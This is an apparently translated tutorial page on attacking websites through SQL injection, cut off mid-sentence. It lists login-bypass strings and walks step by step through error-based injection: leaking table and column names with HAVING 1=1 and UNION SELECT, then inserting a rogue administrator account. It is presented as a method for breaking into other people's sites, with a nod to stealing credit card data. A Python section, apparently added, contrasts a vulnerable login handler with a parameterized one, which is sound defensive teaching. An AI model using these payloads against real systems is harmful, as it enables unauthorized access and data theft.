Techniques for Attacking a Website
CODE
admin'-
' or 0=0 -
" or 0=0 -
or 0=0 -
hi or 1=1-
This is the simplest step of the SQL Injection technique; however, sometimes it gives no clear result on a given vulnerable web site.
CODE
http://www.sqlsecurity.com/ - General information on SQL security and injection
http://w3schools.com/sql/default.asp - Learn and explore the SQL language
2> b. SQL Injection - Retrieving table information:
This is a more advanced technique for exploiting SQL Injection. It consists of 3 steps. First, we cause an error on the web site vulnerable to SQL Injection in order to find table names (with the aim of creating a privileged account). Next, we cause another error to obtain the important table names. Finally, we inject SQL to create an admin account.
To reach that final result, we first log in on the vulnerable web site with the following username:
CODE
Having1=1-
Leave the password empty and press Enter; we receive an error message containing a table name, similar to the following:
SQL
Column user_member.user_id is invalid and was not found ....
(Note that the purple text is an example of a table name.) The error message may be longer, but the important part we need is the table name; in the example above it is user_member.id, which holds the username information. We then carry out the next step to find other important table names:
SQL
UNION SELECT * FROM user_member WHERE USER_ID=admin GROUP BY USER_ID HAVING 1=1;-
The error received may look like this:
QUOTE
Column user_member.user_id is invalid and was not found
Column user_member.passwd is invalid and was not found
The new table obtained here is user_member.passwd, the table that holds the password. Using the tables found this way, we create an account with admin privileges:
SQL
INSERT INTO user_member (USER_NAME, LOGIN_ID, PASSWORD, CREATION_DATE) VALUES(VietLuv,hacked,hacked,GETDATE();-
And now we can log in with admin rights using the username VietLuv and the password hacked.
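The steps above depend on two conditions: login input concatenated into the SQL text, and database error messages returned to the visitor. The following is an added example, not part of the original page, that puts such a login handler beside a hardened one. SQLite stands in for the page's database, and the schema, function names and sample values are assumptions constructed for the demo.

```python
import hashlib, hmac, sqlite3

SALT = b"constructed-demo-salt"  # constructed; use a random per-user salt in practice

def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000).hex()

def make_db():
    # Constructed schema: table name from the page, one sample row.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_member (user_id TEXT PRIMARY KEY, passwd TEXT)")
    db.execute("INSERT INTO user_member VALUES (?, ?)",
               ("admin", pw_hash("constructed-password")))
    return db

def login_vulnerable(db, username, password):
    # Input is pasted into the statement, so a quote in it rewrites the SQL,
    # and the raw driver error is handed back to the client.
    sql = ("SELECT user_id FROM user_member WHERE user_id = '" + username +
           "' AND passwd = '" + pw_hash(password) + "'")
    try:
        return db.execute(sql).fetchone() is not None, None
    except sqlite3.Error as exc:
        return False, str(exc)

def login_hardened(db, username, password):
    # Placeholder binding keeps the username as data; the hash is compared
    # in application code, and every failure returns the same message.
    try:
        row = db.execute("SELECT passwd FROM user_member WHERE user_id = ?",
                         (username,)).fetchone()
    except sqlite3.Error:
        return False, "login failed"  # details belong in the server log only
    ok = row is not None and hmac.compare_digest(row[0], pw_hash(password))
    return ok, (None if ok else "login failed")

def compare(inputs):
    # Returns {input: (vulnerable_result, hardened_result)} with an empty password.
    db = make_db()
    return {u: (login_vulnerable(db, u, ""), login_hardened(db, u, "")) for u in inputs}

# Constructed test inputs: the first is the page's string as printed, the
# second the same string with the SQL comment marker written as "--".
SAMPLES = ["admin'-", "admin'--"]

if __name__ == "__main__":
    for user, (vuln, hard) in compare(SAMPLES).items():
        print(repr(user), "vulnerable:", vuln, "hardened:", hard)
```

In the vulnerable handler the first input surfaces a database parser error and the second authenticates without a password; the hardened handler answers both with the same generic failure.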
The above is only the very basics of exploiting SQL Injection; hackers use SQL Injection to find tables holding important information such as credit cards, and so on. As for